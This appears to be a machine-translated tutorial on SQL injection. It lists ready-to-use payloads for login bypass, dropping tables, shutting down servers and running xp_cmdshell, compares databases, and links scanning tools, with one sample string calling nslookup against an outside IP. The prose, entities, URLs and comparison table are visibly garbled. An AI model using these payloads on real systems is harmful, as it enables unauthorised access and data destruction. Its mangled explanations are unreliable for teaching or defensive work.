The majority of websites nowadays, depending on the content, design their own eye-catching interface. To do this, they just download the database from the Internet and modify the updated data from a database. One of the common background for web datastores is SQL.
One or more web applications can simplify all input scripts by querying a SQL database, a web server itself, or a separate endpoint system. One of the most cunning Web application attacks This includes stealing queries used by the input scripts themselves to dump control of their applications or data. One of the most effective mechanisms for doing this is the technique called " SQL Injection & quot ;.
SQL Injection just put the TransacSQL malicious queries into place to perform unexpected operations. Usually the existing queries are simply Edit to complete the same results.
TransactSQL is easy to manipulate with a single character replacement, depending on the attacker's intelligence to deliver malicious snippets.
Some of the characters commonly used to insert valid data include ('); (-); and;. They have special meanings in Transact-SQL.
We wonder when hackers are stealing SQL queries. What do they do? Initially, they can infiltrate data. With secret techniques, they can access legitimately, or Or even find a way to completely control the entire webserver or SQL terminal system.
SQL Injection Examples: To find the location where SQL Injection errors are occurring, type some of the keywords in the form field:
+ Log in:
Validation without any condition:
USER: 'OR & quot; ='
PASS: 'OR & quot; ='
Validation only with username:
USER: admin '-
Validation as the first user in the user table:
USER: 'or 1 = 1--
Validation as a fake user:
USER: 'union select 1,' user ',' passwd '1--
+ Destruction:
-Remove a table of data:
USER: '; drop table users--
Remote Data Shredder:
USER: aaaaaaaaaaaaaaa '
PASS: '; shutdown--
Execute the function of requesting and storing procedures:
Run xp_cmdshell to get a directory listing:
http: // localhost / script? 0 '; EXEC + master ... # 39; dir';
Xp_service control to take over the service:
http: // localhost / script? 0 '; EXECT + maste ...; server';
Not all the above syntaxes work on most of the data. The following information will show if the methods we have outlined above will work or not in the data base. Type the following for ease of comparison:
Datapase specific Information: --- My SQL ---- Oracle ----- DB2 ------ Postgre ----- MSSQL
UNION possible: ---------------------- Y ------------ Y --------- Y- ----------- Y ------------ Y ---
Subselects possible: ----------------- N ------------ Y --------- Y ------ ------ Y ------------ Y ---
Multiple statements: ----------------- N (mostly) --- N --------- N ---------- Y- ------ Y--
Default stored procedures: ---------_-- Many (utf-file) ------_ ---------- _------- M (cmdshell )
Other Comments: ---------- Supports & quot; intooutfile & quot; -_ ------- _ ----------- _----------- --_
Automatic SQL injection error detection tools:
SQL Injection is usually done by hacker techniques, but some tools can automatically identify and exploit vulnerabilities. Poison is a tool that can detect SQLInjection errors in web pages. SQL errors are stored in a dictionary file, so it's easy for anyone to add their own dictionary list. Poison runs on Linux, available for download at:
http://wpoison.sourceforge.net
There is also the SPIKE Proxy tool, which has pretty good functionality - auto-execute SQL Injection - which string will be Inject depending on the user's habits. SPIKE Proxy is a Python and OpenSSL-rated tool. The basic web application has functions like HTTP and HTTPS Proxy. It allows web developers or web application administrators to access the entire web application medium, while also providing A group of automated tools and skills to discover common errors, including SQL Injection, Website Crawler, Brute Forcer, Automated Overflow Detection, and more. Linux, you can download at:
www.immunitysec.com/spike.html
Note that this software weighs around 13M and your computer must have Python and OpenSSL available. In WinXP this tool does not work.
Mieliekoek.pl is a SQL Insertion Crawler, which checks for forms related to SQL errors. This crm provides a Web mirroring tool such as input, look at each file and the presence of forms in the form. file. The Injected strings can be easily changed in the configuration file. Download Mieliekoek at:
http://packetstormsecurity.nl/UNIX/security/mieliekoek.pl
This tool only works when your machine has PERL installed. Here is an example of output from mieliekoek:
$ badstring = & quot; blah '' ';
# $ badstring = & quot; blah 'or 1 = 1 - & quot ;;
$ badstring = & quot; blah 'exec master..xp_cmdshell' nslookup a.com 196.30.67.5 '-';
